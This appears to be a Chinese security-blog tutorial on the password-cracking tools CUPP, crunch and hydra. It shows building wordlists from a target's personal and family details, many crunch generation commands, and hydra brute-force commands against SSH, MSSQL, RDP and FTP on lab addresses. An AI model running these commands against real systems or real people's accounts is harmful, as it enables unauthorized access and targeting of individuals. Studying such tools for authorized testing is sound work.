干货 | 密码破解中CUPP、Crunch、Hydra常用工具使用
干货 | 密码破解中CUPP、Crunch、Hydra常用工具使用
1、免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。
2、内容速览
口令破解:
易破解的口令如下:
- 弱口令:比如12345、00000这种简单的密码
- 默认口令:服务或者软件自动生成的口令,比如PHPstudy中自动生成MySQL密码为root
- 明文传输:HTTP、FTP、Telnet等传输协议。
破解:
- 在线破解:破解过程中账户需要验证
- 离线破解:密文还原成明文的过程
字典生成工具
字典:
- 弱口令字典:
- 社工字典:
社工字典cupp:
cupp是一款基于python编写的可交互性的密码字典生成工具。结合社会工程学,你会获得一份根据个人信息生成的专属字典。
与传统字典相比,其优势在于准确率更高
Kali默认没有安装,使用如下命令安装:
apt-get install cupp
使用方法 cupp -i
即可按照提示步骤生成字典:
之后就会生成成功
这是它的提示:
-i 是按照提示步骤实施
-w 是引入字典
-l 是下载网上字典
-a 是来自数据库直接解析密码实例演示-生成字典
运行命令"cupp -i",填写受害人姓、名、绰号、生日。**
2.填写受害人配偶的名字、绰号、生日
3.填写孩子的名字、绰号、生日
4.填写宠物的名字以及公司的名字
5.是否添加一些关于受害人的关键词
6.是否在密码结尾添加一些特殊字符
7是否在密码结尾添加一些随机数字
8.填写"y",生成字典,可以在root目录下查看
实例演示-下载字典
1.运行命令 "cupp -l" ,填写你想要下载字典的序号,下载完成的字典保存在"/root/dictionaries/chinese"目录下。
弱口令字典:crunch
kali自带,无需安装。 详细内容见 man crunch
- 使用方法:
crunch <min> <max> [<charset string>] [options]:min和max分别是密码的最小长度和最大长度,后面可以加上字符集和其他选项。 - 比如crunch 1 8 :输出a~zzzzzzzz所有可能的密码
参数
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,记包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/usr/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-o 将密码保存到指定文件
-q 读取密码文件,即读取pass.txt
-r 定义重复一个字符串就重新开始
-s 指定一个开始的字符
-t 指定密码输出的格式
-u 禁止打印百分比
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
-l 生成特殊字符
-p 指定生成元素
?
特殊字符
%代表数字
^代表特殊符号
@代表小写字母
,代表大写字母常见用法
生成最小2位,最大4位,不选字符集默认是26个小写字母
crunch 2 4
crunch 1 2 ab
生成最小为1,最大为6.由abc和空格为元素的所有组合(\代表空格)
crunch 1 6 abc\
调用密码库charset.lst,生成最小为3,最大为3,元素为密码库charset.lst中 mixalpha-numeric-symbol14 的项目,并保存为1.txt;
crunch 3 3 –f /usr/share/crunch/charset.lst mixalpha-numeric-symbol14 >1.txt 注:charset.ls 的目录为 /usr/share/crunch/charset.lst
调用密码库charset.lst,生成8位密码;其中元素为密码库charset.lst中 mixalpha-numeric-symbol14 的项;格式为“两个小写字母+jerry+一个小写字母”。
crunch 8 8 -f charset.lst mixalpha-numeric-symbol14 -t @@jerry@ -s abjerryc >2.txt 注:-t 简单参数详解:%:数字 ^:特殊字符 @:小写字母 ,:大写字母
调用密码库charset.lst,生成2位和3位密码;其中元素为密码库charset.lst中ualpha的项;并且以BB开头
crunch 2 3 -f charset.lst ualpha -s BB
生成最小为1位,最大为5位元素为所有小写字母的密码字典,其中每一个字典文件包含6000个密码,并将密码文件保存为bz2文件,文件名将以 "第一个密码" + " - " + "最后一个密码" + " .txt.bz2 " 保存(比如000-999.txt.bz2)
crunch 1 5 -o START -c 6000 -z bzip2
生成最小为4位,最大为5位元素为所有小写字母的密码字典,并以20M进行分割;这时会生成4个文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三个大概每个20M,最后一个10M左右(因为总共70M)
crunch 4 5 -b 20mib -o START
生成3位密码,其中第一位由“a,b,c”中的一个;第二位为“1,2,3”中的一个;第三位为“!,@,#”中的一个。比如1a! 2a# 3b@ ......
crunch 3 3 abc + 123 @#! -t @%^
注意:如果使用需要限定字符 则直接加需要限定的字符,
如果是要限定数字的话 那么必须在限定的 数字 前面加上 "+" 。生成7个元素组成的密码,其中前三个为 a b c任意组合, 第四位为符号,第五位为大写字母,第六位为小写字母,第七位为数字 。比如abc!Aa1 bac!Aa1
crunch 7 7 –t ddd^,@% -p a b c
注意:-t 后面的 "d" 是从 -p 里面的字符串随机组合,1个d就代表1位生成5位密码,格式为三个字母+两个数字,并限制每个密码最少出现2种字母
crunch 5 5 -d 2@ -t @@@%%
调用密码库unicode_test.lst中的the-greeks项目字符,生成4位密码,其中格式为两小写字母+两数字
crunch 4 4 -f unicode_test.lst the-greeks -t @@%% -l @xdd
口令破解工具hydra
-l 指定一个用户名
-p指定一个密码
-P指定密码字典
-L 指定用户名字典
-vV显示爆破细节
-o保存爆破结果
-f找到正确密码就停止爆破
-e n(null)、s(same)、r(反向)
-e nsr
-t 线程实例:
破解ssh:hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr
结果,破解成功:
常用命令
破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV
破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV
破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.16 8.1.150 ftp -vV